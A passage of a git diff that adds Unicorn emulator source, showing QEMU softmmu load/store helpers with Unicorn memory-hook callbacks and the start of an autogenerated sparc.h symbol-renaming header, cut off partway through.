+ // See UC_HOOK_MEM_READ_AFTER & UC_MEM_READ_AFTER if you only care + // about successful read + if (READ_ACCESS_TYPE == MMU_DATA_LOAD) { + if (!uc->size_recur_mem) { // disabling read callback if in recursive call + HOOK_FOREACH(uc, hook, UC_HOOK_MEM_READ) { + if (hook->to_delete) + continue; + if (!HOOK_BOUND_CHECK(hook, addr)) + continue; + ((uc_cb_hookmem_t)hook->callback)(env->uc, UC_MEM_READ, addr, DATA_SIZE, 0, hook->user_data); + } + } + } + + // Unicorn: callback on non-readable memory + if (READ_ACCESS_TYPE == MMU_DATA_LOAD && mr != NULL && !(mr->perms & UC_PROT_READ)) { //non-readable + handled = false; + HOOK_FOREACH(uc, hook, UC_HOOK_MEM_READ_PROT) { + if (hook->to_delete) + continue; + if (!HOOK_BOUND_CHECK(hook, addr)) + continue; + if ((handled = ((uc_cb_eventmem_t)hook->callback)(uc, UC_MEM_READ_PROT, addr, DATA_SIZE - uc->size_recur_mem, 0, hook->user_data))) + break; + } + + if (handled) { + env->invalid_error = UC_ERR_OK; + } else { + env->invalid_addr = addr; + env->invalid_error = UC_ERR_READ_PROT; + // printf("***** Invalid memory read (non-readable) at " TARGET_FMT_lx "\n", addr); + cpu_exit(uc->current_cpu); + return 0; + } + } + + /* Adjust the given return address. */ + retaddr -= GETPC_ADJ; + + /* If the TLB entry is for a different page, reload and try again. */ + /* If the TLB entry addend is invalidated by any callbacks (perhaps due to + a TLB flush), reload and try again. 
*/ + if ((addr & TARGET_PAGE_MASK) + != (tlb_addr & (TARGET_PAGE_MASK | TLB_INVALID_MASK)) + || env->tlb_table[mmu_idx][index].addend == -1) { +#ifdef ALIGNED_ONLY + if ((addr & (DATA_SIZE - 1)) != 0) { + //cpu_unaligned_access(ENV_GET_CPU(env), addr, READ_ACCESS_TYPE, + // mmu_idx, retaddr); + env->invalid_addr = addr; +#if defined(SOFTMMU_CODE_ACCESS) + env->invalid_error = UC_ERR_FETCH_UNALIGNED; +#else + env->invalid_error = UC_ERR_READ_UNALIGNED; +#endif + cpu_exit(uc->current_cpu); + return 0; + } +#endif + if (!victim_tlb_hit_read(env, addr, mmu_idx, index)) { + tlb_fill(ENV_GET_CPU(env), addr, READ_ACCESS_TYPE, + mmu_idx, retaddr); + } + tlb_addr = env->tlb_table[mmu_idx][index].ADDR_READ; + } + + /* Handle an IO access. */ + if (unlikely(tlb_addr & ~TARGET_PAGE_MASK)) { + hwaddr ioaddr; + if ((addr & (DATA_SIZE - 1)) != 0) { + goto do_unaligned_access; + } + ioaddr = env->iotlb[mmu_idx][index]; + + if (ioaddr == 0) { + env->invalid_addr = addr; + env->invalid_error = UC_ERR_READ_UNMAPPED; + // printf("Invalid memory read at " TARGET_FMT_lx "\n", addr); + cpu_exit(env->uc->current_cpu); + return 0; + } + + /* ??? Note that the io helpers always read data in the target + byte ordering. We should push the LE/BE request down into io. */ + res = glue(io_read, SUFFIX)(env, ioaddr, addr, retaddr); + res = TGT_BE(res); + goto _out; + } + + /* Handle slow unaligned access (it spans two pages or IO). 
*/ + if (DATA_SIZE > 1 + && unlikely((addr & ~TARGET_PAGE_MASK) + DATA_SIZE - 1 + >= TARGET_PAGE_SIZE)) { + target_ulong addr1, addr2; + DATA_TYPE res1, res2; + unsigned shift; + do_unaligned_access: +#ifdef ALIGNED_ONLY + //cpu_unaligned_access(ENV_GET_CPU(env), addr, READ_ACCESS_TYPE, + // mmu_idx, retaddr); + env->invalid_addr = addr; +#if defined(SOFTMMU_CODE_ACCESS) + env->invalid_error = UC_ERR_FETCH_UNALIGNED; +#else + env->invalid_error = UC_ERR_READ_UNALIGNED; +#endif + cpu_exit(uc->current_cpu); + return 0; +#endif + addr1 = addr & ~(DATA_SIZE - 1); + addr2 = addr1 + DATA_SIZE; + /* Note the adjustment at the beginning of the function. + Undo that for the recursion. */ + uc->size_recur_mem = DATA_SIZE - (addr - addr1); // size already treated by callback + res1 = helper_be_ld_name(env, addr1, mmu_idx, retaddr + GETPC_ADJ); + uc->size_recur_mem = (addr2 - addr); + res2 = helper_be_ld_name(env, addr2, mmu_idx, retaddr + GETPC_ADJ); + uc->size_recur_mem = 0; + shift = (addr & (DATA_SIZE - 1)) * 8; + + /* Big-endian combine. */ + res = (res1 << shift) | (res2 >> ((DATA_SIZE * 8) - shift)); + goto _out; + } + + /* Handle aligned access or unaligned access in the same page. 
*/ +#ifdef ALIGNED_ONLY + if ((addr & (DATA_SIZE - 1)) != 0) { + //cpu_unaligned_access(ENV_GET_CPU(env), addr, READ_ACCESS_TYPE, + // mmu_idx, retaddr); + env->invalid_addr = addr; +#if defined(SOFTMMU_CODE_ACCESS) + env->invalid_error = UC_ERR_FETCH_UNALIGNED; +#else + env->invalid_error = UC_ERR_READ_UNALIGNED; +#endif + cpu_exit(uc->current_cpu); + return 0; + } +#endif + + haddr = (uintptr_t)(addr + env->tlb_table[mmu_idx][index].addend); + res = glue(glue(ld, LSUFFIX), _be_p)((uint8_t *)haddr); + +_out: + // Unicorn: callback on successful read + if (READ_ACCESS_TYPE == MMU_DATA_LOAD) { + if (!uc->size_recur_mem) { // disabling read callback if in recursive call + HOOK_FOREACH(uc, hook, UC_HOOK_MEM_READ_AFTER) { + if (hook->to_delete) + continue; + if (!HOOK_BOUND_CHECK(hook, addr)) + continue; + ((uc_cb_hookmem_t)hook->callback)(env->uc, UC_MEM_READ_AFTER, addr, DATA_SIZE, res, hook->user_data); + } + } + } + + return res; +} +#endif /* DATA_SIZE > 1 */ + +DATA_TYPE +glue(glue(helper_ld, SUFFIX), MMUSUFFIX)(CPUArchState *env, target_ulong addr, + int mmu_idx) +{ + return helper_te_ld_name (env, addr, mmu_idx, GETRA()); +} + +#ifndef SOFTMMU_CODE_ACCESS + +/* Provide signed versions of the load routines as well. We can of course + avoid this for 64-bit data, or for 32-bit data on 32-bit host. 
*/ +#if DATA_SIZE * 8 < TCG_TARGET_REG_BITS +WORD_TYPE helper_le_lds_name(CPUArchState *env, target_ulong addr, + int mmu_idx, uintptr_t retaddr) +{ + return (SDATA_TYPE)helper_le_ld_name(env, addr, mmu_idx, retaddr); +} + +# if DATA_SIZE > 1 +WORD_TYPE helper_be_lds_name(CPUArchState *env, target_ulong addr, + int mmu_idx, uintptr_t retaddr) +{ + return (SDATA_TYPE)helper_be_ld_name(env, addr, mmu_idx, retaddr); +} +# endif +#endif + +static inline void glue(io_write, SUFFIX)(CPUArchState *env, + hwaddr physaddr, + DATA_TYPE val, + target_ulong addr, + uintptr_t retaddr) +{ + CPUState *cpu = ENV_GET_CPU(env); + MemoryRegion *mr = iotlb_to_region(cpu->as, physaddr); + + physaddr = (physaddr & TARGET_PAGE_MASK) + addr; + if (mr != &(cpu->uc->io_mem_rom) && mr != &(cpu->uc->io_mem_notdirty) + && !cpu_can_do_io(cpu)) { + cpu_io_recompile(cpu, retaddr); + } + + cpu->mem_io_vaddr = addr; + cpu->mem_io_pc = retaddr; + io_mem_write(mr, physaddr, val, 1 << SHIFT); +} + +void helper_le_st_name(CPUArchState *env, target_ulong addr, DATA_TYPE val, + int mmu_idx, uintptr_t retaddr) +{ + int index = (addr >> TARGET_PAGE_BITS) & (CPU_TLB_SIZE - 1); + target_ulong tlb_addr = env->tlb_table[mmu_idx][index].addr_write; + uintptr_t haddr; + struct hook *hook; + bool handled; + HOOK_FOREACH_VAR_DECLARE; + + struct uc_struct *uc = env->uc; + MemoryRegion *mr = memory_mapping(uc, addr); + + if (!uc->size_recur_mem) { // disabling write callback if in recursive call + // Unicorn: callback on memory write + HOOK_FOREACH(uc, hook, UC_HOOK_MEM_WRITE) { + if (hook->to_delete) + continue; + if (!HOOK_BOUND_CHECK(hook, addr)) + continue; + ((uc_cb_hookmem_t)hook->callback)(uc, UC_MEM_WRITE, addr, DATA_SIZE, val, hook->user_data); + } + } + + // Unicorn: callback on invalid memory + if (mr == NULL) { + handled = false; + HOOK_FOREACH(uc, hook, UC_HOOK_MEM_WRITE_UNMAPPED) { + if (hook->to_delete) + continue; + if (!HOOK_BOUND_CHECK(hook, addr)) + continue; + if ((handled = 
((uc_cb_eventmem_t)hook->callback)(uc, UC_MEM_WRITE_UNMAPPED, addr, DATA_SIZE, val, hook->user_data))) + break; + } + + if (!handled) { + // save error & quit + env->invalid_addr = addr; + env->invalid_error = UC_ERR_WRITE_UNMAPPED; + // printf("***** Invalid memory write at " TARGET_FMT_lx "\n", addr); + cpu_exit(uc->current_cpu); + return; + } else { + env->invalid_error = UC_ERR_OK; + mr = memory_mapping(uc, addr); // FIXME: what if mr is still NULL at this time? + } + } + + // Unicorn: callback on non-writable memory + if (mr != NULL && !(mr->perms & UC_PROT_WRITE)) { //non-writable + handled = false; + HOOK_FOREACH(uc, hook, UC_HOOK_MEM_WRITE_PROT) { + if (hook->to_delete) + continue; + if (!HOOK_BOUND_CHECK(hook, addr)) + continue; + if ((handled = ((uc_cb_eventmem_t)hook->callback)(uc, UC_MEM_WRITE_PROT, addr, DATA_SIZE, val, hook->user_data))) + break; + } + + if (handled) { + env->invalid_error = UC_ERR_OK; + } else { + env->invalid_addr = addr; + env->invalid_error = UC_ERR_WRITE_PROT; + // printf("***** Invalid memory write (ro) at " TARGET_FMT_lx "\n", addr); + cpu_exit(uc->current_cpu); + return; + } + } + + /* Adjust the given return address. */ + retaddr -= GETPC_ADJ; + + /* If the TLB entry is for a different page, reload and try again. */ + if ((addr & TARGET_PAGE_MASK) + != (tlb_addr & (TARGET_PAGE_MASK | TLB_INVALID_MASK))) { +#ifdef ALIGNED_ONLY + if ((addr & (DATA_SIZE - 1)) != 0) { + //cpu_unaligned_access(ENV_GET_CPU(env), addr, MMU_DATA_STORE, + // mmu_idx, retaddr); + env->invalid_addr = addr; + env->invalid_error = UC_ERR_WRITE_UNALIGNED; + cpu_exit(uc->current_cpu); + return; + } +#endif + if (!victim_tlb_hit_write(env, addr, mmu_idx, index)) { + tlb_fill(ENV_GET_CPU(env), addr, MMU_DATA_STORE, mmu_idx, retaddr); + } + tlb_addr = env->tlb_table[mmu_idx][index].addr_write; + } + + /* Handle an IO access. 
*/ + if (unlikely(tlb_addr & ~TARGET_PAGE_MASK)) { + hwaddr ioaddr; + if ((addr & (DATA_SIZE - 1)) != 0) { + goto do_unaligned_access; + } + ioaddr = env->iotlb[mmu_idx][index]; + if (ioaddr == 0) { + env->invalid_addr = addr; + env->invalid_error = UC_ERR_WRITE_UNMAPPED; + // printf("***** Invalid memory write at " TARGET_FMT_lx "\n", addr); + cpu_exit(env->uc->current_cpu); + return; + } + + /* ??? Note that the io helpers always read data in the target + byte ordering. We should push the LE/BE request down into io. */ + val = TGT_LE(val); + glue(io_write, SUFFIX)(env, ioaddr, val, addr, retaddr); + return; + } + + /* Handle slow unaligned access (it spans two pages or IO). */ + if (DATA_SIZE > 1 + && unlikely((addr & ~TARGET_PAGE_MASK) + DATA_SIZE - 1 + >= TARGET_PAGE_SIZE)) { + int i; + do_unaligned_access: +#ifdef ALIGNED_ONLY + cpu_unaligned_access(ENV_GET_CPU(env), addr, MMU_DATA_STORE, + mmu_idx, retaddr); + env->invalid_addr = addr; + env->invalid_error = UC_ERR_WRITE_UNALIGNED; + cpu_exit(uc->current_cpu); + return; +#endif + /* XXX: not efficient, but simple */ + /* Note: relies on the fact that tlb_fill() does not remove the + * previous page from the TLB cache. */ + for (i = DATA_SIZE - 1; i >= 0; i--) { + /* Little-endian extract. */ + uint8_t val8 = (uint8_t)(val >> (i * 8)); + // size already treated, this is used only for disabling the write cb + uc->size_recur_mem = DATA_SIZE - i ; + /* Note the adjustment at the beginning of the function. + Undo that for the recursion. */ + glue(helper_ret_stb, MMUSUFFIX)(env, addr + i, val8, + mmu_idx, retaddr + GETPC_ADJ); + if (env->invalid_error != UC_ERR_OK) + break; + } + uc->size_recur_mem = 0; + return; + } + + /* Handle aligned access or unaligned access in the same page. 
*/ +#ifdef ALIGNED_ONLY + if ((addr & (DATA_SIZE - 1)) != 0) { + cpu_unaligned_access(ENV_GET_CPU(env), addr, MMU_DATA_STORE, + mmu_idx, retaddr); + env->invalid_addr = addr; + env->invalid_error = UC_ERR_WRITE_UNALIGNED; + cpu_exit(uc->current_cpu); + return; + } +#endif + + haddr = (uintptr_t)(addr + env->tlb_table[mmu_idx][index].addend); +#if DATA_SIZE == 1 + glue(glue(st, SUFFIX), _p)((uint8_t *)haddr, val); +#else + glue(glue(st, SUFFIX), _le_p)((uint8_t *)haddr, val); +#endif +} + +#if DATA_SIZE > 1 +void helper_be_st_name(CPUArchState *env, target_ulong addr, DATA_TYPE val, + int mmu_idx, uintptr_t retaddr) +{ + int index = (addr >> TARGET_PAGE_BITS) & (CPU_TLB_SIZE - 1); + target_ulong tlb_addr = env->tlb_table[mmu_idx][index].addr_write; + uintptr_t haddr; + struct hook *hook; + bool handled; + HOOK_FOREACH_VAR_DECLARE; + + struct uc_struct *uc = env->uc; + MemoryRegion *mr = memory_mapping(uc, addr); + + if (!uc->size_recur_mem) { // disabling write callback if in recursive call + // Unicorn: callback on memory write + HOOK_FOREACH(uc, hook, UC_HOOK_MEM_WRITE) { + if (hook->to_delete) + continue; + if (!HOOK_BOUND_CHECK(hook, addr)) + continue; + ((uc_cb_hookmem_t)hook->callback)(uc, UC_MEM_WRITE, addr, DATA_SIZE, val, hook->user_data); + } + } + + // Unicorn: callback on invalid memory + if (mr == NULL) { + handled = false; + HOOK_FOREACH(uc, hook, UC_HOOK_MEM_WRITE_UNMAPPED) { + if (hook->to_delete) + continue; + if (!HOOK_BOUND_CHECK(hook, addr)) + continue; + if ((handled = ((uc_cb_eventmem_t)hook->callback)(uc, UC_MEM_WRITE_UNMAPPED, addr, DATA_SIZE, val, hook->user_data))) + break; + } + + if (!handled) { + // save error & quit + env->invalid_addr = addr; + env->invalid_error = UC_ERR_WRITE_UNMAPPED; + // printf("***** Invalid memory write at " TARGET_FMT_lx "\n", addr); + cpu_exit(uc->current_cpu); + return; + } else { + env->invalid_error = UC_ERR_OK; + mr = memory_mapping(uc, addr); // FIXME: what if mr is still NULL at this time? 
+ } + } + + // Unicorn: callback on non-writable memory + if (mr != NULL && !(mr->perms & UC_PROT_WRITE)) { //non-writable + handled = false; + HOOK_FOREACH(uc, hook, UC_HOOK_MEM_WRITE_PROT) { + if (hook->to_delete) + continue; + if (!HOOK_BOUND_CHECK(hook, addr)) + continue; + if ((handled = ((uc_cb_eventmem_t)hook->callback)(uc, UC_MEM_WRITE_PROT, addr, DATA_SIZE, val, hook->user_data))) + break; + } + + if (handled) { + env->invalid_error = UC_ERR_OK; + } else { + env->invalid_addr = addr; + env->invalid_error = UC_ERR_WRITE_PROT; + // printf("***** Invalid memory write (ro) at " TARGET_FMT_lx "\n", addr); + cpu_exit(uc->current_cpu); + return; + } + } + + /* Adjust the given return address. */ + retaddr -= GETPC_ADJ; + + /* If the TLB entry is for a different page, reload and try again. */ + if ((addr & TARGET_PAGE_MASK) + != (tlb_addr & (TARGET_PAGE_MASK | TLB_INVALID_MASK))) { +#ifdef ALIGNED_ONLY + if ((addr & (DATA_SIZE - 1)) != 0) { + cpu_unaligned_access(ENV_GET_CPU(env), addr, MMU_DATA_STORE, + mmu_idx, retaddr); + env->invalid_addr = addr; + env->invalid_error = UC_ERR_WRITE_UNALIGNED; + cpu_exit(uc->current_cpu); + return; + } +#endif + if (!victim_tlb_hit_write(env, addr, mmu_idx, index)) { + tlb_fill(ENV_GET_CPU(env), addr, MMU_DATA_STORE, mmu_idx, retaddr); + } + tlb_addr = env->tlb_table[mmu_idx][index].addr_write; + } + + /* Handle an IO access. */ + if (unlikely(tlb_addr & ~TARGET_PAGE_MASK)) { + hwaddr ioaddr; + if ((addr & (DATA_SIZE - 1)) != 0) { + goto do_unaligned_access; + } + ioaddr = env->iotlb[mmu_idx][index]; + if (ioaddr == 0) { + env->invalid_addr = addr; + env->invalid_error = UC_ERR_WRITE_UNMAPPED; + // printf("***** Invalid memory write at " TARGET_FMT_lx "\n", addr); + cpu_exit(env->uc->current_cpu); + return; + } + + /* ??? Note that the io helpers always read data in the target + byte ordering. We should push the LE/BE request down into io. 
*/ + val = TGT_BE(val); + glue(io_write, SUFFIX)(env, ioaddr, val, addr, retaddr); + return; + } + + /* Handle slow unaligned access (it spans two pages or IO). */ + if (DATA_SIZE > 1 + && unlikely((addr & ~TARGET_PAGE_MASK) + DATA_SIZE - 1 + >= TARGET_PAGE_SIZE)) { + int i; + do_unaligned_access: +#ifdef ALIGNED_ONLY + cpu_unaligned_access(ENV_GET_CPU(env), addr, MMU_DATA_STORE, + mmu_idx, retaddr); + env->invalid_addr = addr; + env->invalid_error = UC_ERR_WRITE_UNALIGNED; + cpu_exit(uc->current_cpu); + return; +#endif + /* XXX: not efficient, but simple */ + /* Note: relies on the fact that tlb_fill() does not remove the + * previous page from the TLB cache. */ + for (i = DATA_SIZE - 1; i >= 0; i--) { + /* Big-endian extract. */ + uint8_t val8 = (uint8_t)(val >> (((DATA_SIZE - 1) * 8) - (i * 8))); + // size already treated, this is used only for diabling the write cb + uc->size_recur_mem = DATA_SIZE - i ; + /* Note the adjustment at the beginning of the function. + Undo that for the recursion. */ + glue(helper_ret_stb, MMUSUFFIX)(env, addr + i, val8, + mmu_idx, retaddr + GETPC_ADJ); + if (env->invalid_error != UC_ERR_OK) + break; + } + uc->size_recur_mem = 0; + return; + } + + /* Handle aligned access or unaligned access in the same page. 
*/ +#ifdef ALIGNED_ONLY + if ((addr & (DATA_SIZE - 1)) != 0) { + cpu_unaligned_access(ENV_GET_CPU(env), addr, MMU_DATA_STORE, + mmu_idx, retaddr); + env->invalid_addr = addr; + env->invalid_error = UC_ERR_WRITE_UNALIGNED; + cpu_exit(uc->current_cpu); + return; + } +#endif + + haddr = (uintptr_t)(addr + env->tlb_table[mmu_idx][index].addend); + glue(glue(st, SUFFIX), _be_p)((uint8_t *)haddr, val); +} +#endif /* DATA_SIZE > 1 */ + +void +glue(glue(helper_st, SUFFIX), MMUSUFFIX)(CPUArchState *env, target_ulong addr, + DATA_TYPE val, int mmu_idx) +{ + helper_te_st_name(env, addr, val, mmu_idx, GETRA()); +} + +#endif /* !defined(SOFTMMU_CODE_ACCESS) */ + +#undef READ_ACCESS_TYPE +#undef SHIFT +#undef DATA_TYPE +#undef SUFFIX +#undef LSUFFIX +#undef DATA_SIZE +#undef ADDR_READ +#undef WORD_TYPE +#undef SDATA_TYPE +#undef USUFFIX +#undef SSUFFIX +#undef BSWAP +#undef TGT_BE +#undef TGT_LE +#undef CPU_BE +#undef CPU_LE +#undef helper_le_ld_name +#undef helper_be_ld_name +#undef helper_le_lds_name +#undef helper_be_lds_name +#undef helper_le_st_name +#undef helper_be_st_name +#undef helper_te_ld_name +#undef helper_te_st_name diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/sparc.h b/ai_anti_malware/unicorn/unicorn-master/qemu/sparc.h new file mode 100644 index 0000000..4fbf55e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/sparc.h @@ -0,0 +1,3092 @@ +/* Autogen header for Unicorn Engine - DONOT MODIFY */ +#ifndef UNICORN_AUTOGEN_SPARC_H +#define UNICORN_AUTOGEN_SPARC_H +#define arm_release arm_release_sparc +#define aarch64_tb_set_jmp_target aarch64_tb_set_jmp_target_sparc +#define ppc_tb_set_jmp_target ppc_tb_set_jmp_target_sparc +#define use_idiv_instructions_rt use_idiv_instructions_rt_sparc +#define tcg_target_deposit_valid tcg_target_deposit_valid_sparc +#define helper_power_down helper_power_down_sparc +#define check_exit_request check_exit_request_sparc +#define address_space_unregister address_space_unregister_sparc +#define 
tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_sparc +#define phys_mem_clean phys_mem_clean_sparc +#define tb_cleanup tb_cleanup_sparc +#define memory_map memory_map_sparc +#define memory_map_ptr memory_map_ptr_sparc +#define memory_unmap memory_unmap_sparc +#define memory_free memory_free_sparc +#define free_code_gen_buffer free_code_gen_buffer_sparc +#define helper_raise_exception helper_raise_exception_sparc +#define tcg_enabled tcg_enabled_sparc +#define tcg_exec_init tcg_exec_init_sparc +#define memory_register_types memory_register_types_sparc +#define cpu_exec_init_all cpu_exec_init_all_sparc +#define vm_start vm_start_sparc +#define resume_all_vcpus resume_all_vcpus_sparc +#define a15_l2ctlr_read a15_l2ctlr_read_sparc +#define a64_translate_init a64_translate_init_sparc +#define aa32_generate_debug_exceptions aa32_generate_debug_exceptions_sparc +#define aa64_cacheop_access aa64_cacheop_access_sparc +#define aa64_daif_access aa64_daif_access_sparc +#define aa64_daif_write aa64_daif_write_sparc +#define aa64_dczid_read aa64_dczid_read_sparc +#define aa64_fpcr_read aa64_fpcr_read_sparc +#define aa64_fpcr_write aa64_fpcr_write_sparc +#define aa64_fpsr_read aa64_fpsr_read_sparc +#define aa64_fpsr_write aa64_fpsr_write_sparc +#define aa64_generate_debug_exceptions aa64_generate_debug_exceptions_sparc +#define aa64_zva_access aa64_zva_access_sparc +#define aarch64_banked_spsr_index aarch64_banked_spsr_index_sparc +#define aarch64_restore_sp aarch64_restore_sp_sparc +#define aarch64_save_sp aarch64_save_sp_sparc +#define accel_find accel_find_sparc +#define accel_init_machine accel_init_machine_sparc +#define accel_type accel_type_sparc +#define access_with_adjusted_size access_with_adjusted_size_sparc +#define add128 add128_sparc +#define add16_sat add16_sat_sparc +#define add16_usat add16_usat_sparc +#define add192 add192_sparc +#define add8_sat add8_sat_sparc +#define add8_usat add8_usat_sparc +#define add_cpreg_to_hashtable 
add_cpreg_to_hashtable_sparc +#define add_cpreg_to_list add_cpreg_to_list_sparc +#define addFloat128Sigs addFloat128Sigs_sparc +#define addFloat32Sigs addFloat32Sigs_sparc +#define addFloat64Sigs addFloat64Sigs_sparc +#define addFloatx80Sigs addFloatx80Sigs_sparc +#define add_qemu_ldst_label add_qemu_ldst_label_sparc +#define address_space_access_valid address_space_access_valid_sparc +#define address_space_destroy address_space_destroy_sparc +#define address_space_destroy_dispatch address_space_destroy_dispatch_sparc +#define address_space_get_flatview address_space_get_flatview_sparc +#define address_space_init address_space_init_sparc +#define address_space_init_dispatch address_space_init_dispatch_sparc +#define address_space_lookup_region address_space_lookup_region_sparc +#define address_space_map address_space_map_sparc +#define address_space_read address_space_read_sparc +#define address_space_rw address_space_rw_sparc +#define address_space_translate address_space_translate_sparc +#define address_space_translate_for_iotlb address_space_translate_for_iotlb_sparc +#define address_space_translate_internal address_space_translate_internal_sparc +#define address_space_unmap address_space_unmap_sparc +#define address_space_update_topology address_space_update_topology_sparc +#define address_space_update_topology_pass address_space_update_topology_pass_sparc +#define address_space_write address_space_write_sparc +#define addrrange_contains addrrange_contains_sparc +#define addrrange_end addrrange_end_sparc +#define addrrange_equal addrrange_equal_sparc +#define addrrange_intersection addrrange_intersection_sparc +#define addrrange_intersects addrrange_intersects_sparc +#define addrrange_make addrrange_make_sparc +#define adjust_endianness adjust_endianness_sparc +#define all_helpers all_helpers_sparc +#define alloc_code_gen_buffer alloc_code_gen_buffer_sparc +#define alloc_entry alloc_entry_sparc +#define always_true always_true_sparc +#define arm1026_initfn 
arm1026_initfn_sparc +#define arm1136_initfn arm1136_initfn_sparc +#define arm1136_r2_initfn arm1136_r2_initfn_sparc +#define arm1176_initfn arm1176_initfn_sparc +#define arm11mpcore_initfn arm11mpcore_initfn_sparc +#define arm926_initfn arm926_initfn_sparc +#define arm946_initfn arm946_initfn_sparc +#define arm_ccnt_enabled arm_ccnt_enabled_sparc +#define arm_cp_read_zero arm_cp_read_zero_sparc +#define arm_cp_reset_ignore arm_cp_reset_ignore_sparc +#define arm_cpu_do_interrupt arm_cpu_do_interrupt_sparc +#define arm_cpu_exec_interrupt arm_cpu_exec_interrupt_sparc +#define arm_cpu_finalizefn arm_cpu_finalizefn_sparc +#define arm_cpu_get_phys_page_debug arm_cpu_get_phys_page_debug_sparc +#define arm_cpu_handle_mmu_fault arm_cpu_handle_mmu_fault_sparc +#define arm_cpu_initfn arm_cpu_initfn_sparc +#define arm_cpu_list arm_cpu_list_sparc +#define cpu_loop_exit cpu_loop_exit_sparc +#define arm_cpu_post_init arm_cpu_post_init_sparc +#define arm_cpu_realizefn arm_cpu_realizefn_sparc +#define arm_cpu_register_gdb_regs_for_features arm_cpu_register_gdb_regs_for_features_sparc +#define arm_cpu_register_types arm_cpu_register_types_sparc +#define cpu_resume_from_signal cpu_resume_from_signal_sparc +#define arm_cpus arm_cpus_sparc +#define arm_cpu_set_pc arm_cpu_set_pc_sparc +#define arm_cp_write_ignore arm_cp_write_ignore_sparc +#define arm_current_el arm_current_el_sparc +#define arm_dc_feature arm_dc_feature_sparc +#define arm_debug_excp_handler arm_debug_excp_handler_sparc +#define arm_debug_target_el arm_debug_target_el_sparc +#define arm_el_is_aa64 arm_el_is_aa64_sparc +#define arm_env_get_cpu arm_env_get_cpu_sparc +#define arm_excp_target_el arm_excp_target_el_sparc +#define arm_excp_unmasked arm_excp_unmasked_sparc +#define arm_feature arm_feature_sparc +#define arm_generate_debug_exceptions arm_generate_debug_exceptions_sparc +#define gen_intermediate_code gen_intermediate_code_sparc +#define gen_intermediate_code_pc gen_intermediate_code_pc_sparc +#define 
arm_gen_test_cc arm_gen_test_cc_sparc +#define arm_gt_ptimer_cb arm_gt_ptimer_cb_sparc +#define arm_gt_vtimer_cb arm_gt_vtimer_cb_sparc +#define arm_handle_psci_call arm_handle_psci_call_sparc +#define arm_is_psci_call arm_is_psci_call_sparc +#define arm_is_secure arm_is_secure_sparc +#define arm_is_secure_below_el3 arm_is_secure_below_el3_sparc +#define arm_ldl_code arm_ldl_code_sparc +#define arm_lduw_code arm_lduw_code_sparc +#define arm_log_exception arm_log_exception_sparc +#define arm_reg_read arm_reg_read_sparc +#define arm_reg_reset arm_reg_reset_sparc +#define arm_reg_write arm_reg_write_sparc +#define restore_state_to_opc restore_state_to_opc_sparc +#define arm_rmode_to_sf arm_rmode_to_sf_sparc +#define arm_singlestep_active arm_singlestep_active_sparc +#define tlb_fill tlb_fill_sparc +#define tlb_flush tlb_flush_sparc +#define tlb_flush_page tlb_flush_page_sparc +#define tlb_set_page tlb_set_page_sparc +#define arm_translate_init arm_translate_init_sparc +#define arm_v7m_class_init arm_v7m_class_init_sparc +#define arm_v7m_cpu_do_interrupt arm_v7m_cpu_do_interrupt_sparc +#define ats_access ats_access_sparc +#define ats_write ats_write_sparc +#define bad_mode_switch bad_mode_switch_sparc +#define bank_number bank_number_sparc +#define bitmap_zero_extend bitmap_zero_extend_sparc +#define bp_wp_matches bp_wp_matches_sparc +#define breakpoint_invalidate breakpoint_invalidate_sparc +#define build_page_bitmap build_page_bitmap_sparc +#define bus_add_child bus_add_child_sparc +#define bus_class_init bus_class_init_sparc +#define bus_info bus_info_sparc +#define bus_unparent bus_unparent_sparc +#define cache_block_ops_cp_reginfo cache_block_ops_cp_reginfo_sparc +#define cache_dirty_status_cp_reginfo cache_dirty_status_cp_reginfo_sparc +#define cache_test_clean_cp_reginfo cache_test_clean_cp_reginfo_sparc +#define call_recip_estimate call_recip_estimate_sparc +#define can_merge can_merge_sparc +#define capacity_increase capacity_increase_sparc +#define 
ccsidr_read ccsidr_read_sparc +#define check_ap check_ap_sparc +#define check_breakpoints check_breakpoints_sparc +#define check_watchpoints check_watchpoints_sparc +#define cho cho_sparc +#define clear_bit clear_bit_sparc +#define clz32 clz32_sparc +#define clz64 clz64_sparc +#define cmp_flatrange_addr cmp_flatrange_addr_sparc +#define code_gen_alloc code_gen_alloc_sparc +#define commonNaNToFloat128 commonNaNToFloat128_sparc +#define commonNaNToFloat16 commonNaNToFloat16_sparc +#define commonNaNToFloat32 commonNaNToFloat32_sparc +#define commonNaNToFloat64 commonNaNToFloat64_sparc +#define commonNaNToFloatx80 commonNaNToFloatx80_sparc +#define compute_abs_deadline compute_abs_deadline_sparc +#define cond_name cond_name_sparc +#define configure_accelerator configure_accelerator_sparc +#define container_get container_get_sparc +#define container_info container_info_sparc +#define container_register_types container_register_types_sparc +#define contextidr_write contextidr_write_sparc +#define core_log_global_start core_log_global_start_sparc +#define core_log_global_stop core_log_global_stop_sparc +#define core_memory_listener core_memory_listener_sparc +#define cortexa15_cp_reginfo cortexa15_cp_reginfo_sparc +#define cortex_a15_initfn cortex_a15_initfn_sparc +#define cortexa8_cp_reginfo cortexa8_cp_reginfo_sparc +#define cortex_a8_initfn cortex_a8_initfn_sparc +#define cortexa9_cp_reginfo cortexa9_cp_reginfo_sparc +#define cortex_a9_initfn cortex_a9_initfn_sparc +#define cortex_m3_initfn cortex_m3_initfn_sparc +#define count_cpreg count_cpreg_sparc +#define countLeadingZeros32 countLeadingZeros32_sparc +#define countLeadingZeros64 countLeadingZeros64_sparc +#define cp_access_ok cp_access_ok_sparc +#define cpacr_write cpacr_write_sparc +#define cpreg_field_is_64bit cpreg_field_is_64bit_sparc +#define cp_reginfo cp_reginfo_sparc +#define cpreg_key_compare cpreg_key_compare_sparc +#define cpreg_make_keylist cpreg_make_keylist_sparc +#define cp_reg_reset 
